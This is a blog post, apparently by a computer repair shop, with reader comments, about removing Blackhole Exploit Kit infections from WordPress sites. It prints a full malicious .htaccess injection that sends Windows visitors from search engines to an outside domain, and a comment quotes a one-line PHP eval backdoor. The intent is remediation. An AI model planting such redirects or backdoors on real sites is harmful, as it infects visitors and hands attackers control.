We didn’t care about the Blackhole Exploit Kit problem with WordPress until it happened to our client. You can imagine my shock when I went to create a blog post on CPG only to receive the notification from AVG Link Scanner that a threat from Computer Parts Greenville was blocked. This had to be a mistake. The AVG message said,
Exploit Blackhole Exploit Kit (Type 2115)
Clicking “Show Details” and “More Information” produced useless information, so I asked our webmistress to look into the problem.
The Blackhole Exploit Kit exploit temporarily infected Computer Parts Greenville. Here's how to solve the problem on WordPress blogs. Click to enlarge.
For days, I had our webmistress scanning our domain. For days, I had her learn about the Blackhole Exploit Kit Exploit. Guess what kind of information she got from Google? The same kind of information I got: zilch.
Dissing Search Engines
I must take a moment to diss the search engines. For some reason, as time progresses, I find less and less useful information from Google and Bing than valuable information. The Farmer / Panda Updates were supposed to make sure we all got search results that were relevant and valuable. Google and Bing have failed. Still, I had to fire our webmistress. Though I sympathize with her inability to find worthwhile information about the Blackhole Exploit Kit exploit, she should have the expertise to solve these kinds of problems. That’s why we paid her the big bucks.
Symptoms of Blackhole
The following observations helped us understand Blackhole:
The Type 2115 Doesn’t Mean Much
Blackhole exploits come with a variety of type numbers. Don’t get hung up on them.
Banned from Bing
After receiving the AVG message while trying to load the Computer Parts website, the next symptom I noticed about our brief experience with Blackhole was that Bing sent us all an email saying that computerpartsgreenvillesc.com hosted malware. I got angry. There’s no way we host malware. It must come from the advertising network. We got rid of it. I still received AVG messages. By the way, Google continued to report that the Computer Parts website was malware free.
Intermittent
The Blackhole Exploit does not always return a malware message. Apparently to make it difficult to detect, the exploit only periodically attempts to infect website visitors (comforting, is it not?).
Frustrating
What frustrated us the most about Blackhole was our inability to find a meaningful solution to the problem. We found descriptions of the problem and fake solutions to the problem, but no real solutions. Our webmistress finally answered my questions before I gave her the ax.
Fixing Blackhole Exploit Kit infections in WordPress
I don’t give a flyin’ flip about Blackhole Exploit Kit on websites other than WordPress, OK? Besides, this information may help anyone who deals with the Blackhole problem.
Timthumb.php or Thumb.php
Blackhole Exploit Kit enters WordPress by exploiting Timthumb.php or Thumb.php. (Your WordPress blog has one or the other, depending on your theme.) This file works to dynamically resize images. The pesky, evil bleeps who figured this out should be shot. Anyway, this thing dynamically loads a trojan from third-party sites into WordPress Web pages. This explains why you can search all day and not find malware in any pages on an infected site.
Fixing Timthumb.php or Thumb.php
WordPress webmasters can find thumb.php or timthumb.php inside the main folder for every WordPress theme (some themes do not use timthumb).
First, webmasters should download the latest timthumb.php Next, they should change the file as follows:
define( 'ALLOW_EXTERNAL', false ); |
and
$allowedSites = array(); |
Finally, webmasters should upload the new file to the theme directory of every timthumb-enabled theme.
An Easier Way
As an alternative, webmasters can download the Timthumb Vulnerability Scanner and then upload it to their plugins directory. Webmasters should then navigate to the Tools tab in their WordPress admin panel and then click the Scan button.
The scanner will identify infected thumb.php and timthumb.php files, but webmasters must manually delete them. Next, users can choose to update vulnerable files. If you want, website owners can hire Code Garage (the developer of the vulnerability scanner) to solve the problem, but most people can do this themselves. Computer Parts Greenville can help you do this too.
That’s Not All Folks! Check .htaccess!
If you solved the timthumb problem, you might think you have completed your recovery. Wrong! Take a look at your .htaccess file. When you open it, it may look as though it were blank. Scroll down about 778 lines and you will see maliciously-injected code. Until you fix this, WordPress will continue to inject trojans into visiting Web browsers. The original content of the .htaccess file remains in the file. Check at line 1592 or so. Here’s what the malicious code looks like. Different Blackhole infections may look slightly different.
RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC] RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] RewriteCond %{HTTP_COOKIE} !^.*dHK.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC] RewriteCond %{HTTPS} ^off$ RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.org/url?sa=D&source=web&cd=40&ved=0GuhP3Pg6&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMsfq3I6K+wrI2Oz1A3+py1oQ==&usg=akutnxYqq9yva75j7XV0f8&sig2=6IwYwr5uIjrVSOmJayjLjr [R=302,L,CO=dHK:68:%{HTTP_HOST}:9540:/:0:HttpOnly] #1c19e3ee4b8f15f4c02fe6977b77eb2ef831841123ecc963f40dd06b |
After you delete all the blank lines as well as all the malicious code, you should have nothing left than your original .htaccess file. It looks something like this:
# BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress |
You have now finished recovering a WordPress-based website from the Blackhole Exploit Kit Exploit. Before going live with your website, be sure your wp-content folder has permissions set to 755. Also, if you use a WordPress caching plugin, you should delete your cache to remove all instances of corrupted code.
You should also change the passwords for your MySQL database, all your WordPress users and site FTP users.
Other Issues
Blackhole Exploit Kits have become a very serious problem in the WordPress community. Read Alexis Blackshear’s report on Blackhole Exploit Kit faking Google Analytics and see how she suggests webmasters save time in recovery. Also, check out these other Computer Parts Greenville articles on the topic:
Our client’s website also had the blackhole exploit kit which would attempt to run a java plugin at random visits to the site. They don’t have thumb.php or timthumb.php and it’s not running apache so there’s no .htaccess file.
I found obfuscated php eval code at the beginning of index.php. I also found a new file in the wp root directory named ccjiqf.php which also had obfuscated php eval code.
I’m not sure what the entry point was. I suspect it might have been the wp-phpmyadmin plugin which is reported to having vulnerabilities.
My solution was to recreate the index.php file, remove ccjiqf.php, chown root:root index.php, remove wp-phpmyadmin, change ftp/user and mysql passwords.
Jason, Thanks for the great info about your Blackhole experience!
Also found this code in wp-includes/googlee8fe0e085b0387489db4a37d81369a46.php
[code]@eval(stripslashes($_REQUEST[asc]));[/code]
That was there for a while before the blackhole exploit. I’m not sure what it’s from. Any ideas?
Also, all of the theme index.php files had the obfuscated php eval code as well.
Had this issue as well. Oddly it did not manifest in the same way as you have described, making me think that I had another version of the exploit. The main remedy was to fix the .htaccess file and I’m waiting to see if the symptom returns. I did not have the same .htaccess problems as you.
Thanks for posting info about this!
guys, i have just realized that my website also infected by it.
im not a tech guy, how can computerpartgreenville could help me to solve this?
heeellllpppp!!!!
Hi there
Thank you for this info. It appears updating and changing the timthumb files has fixed it for me. Thank you!!!
Laura
Or not… It’s back
Could it be possible that my actual computer is infected?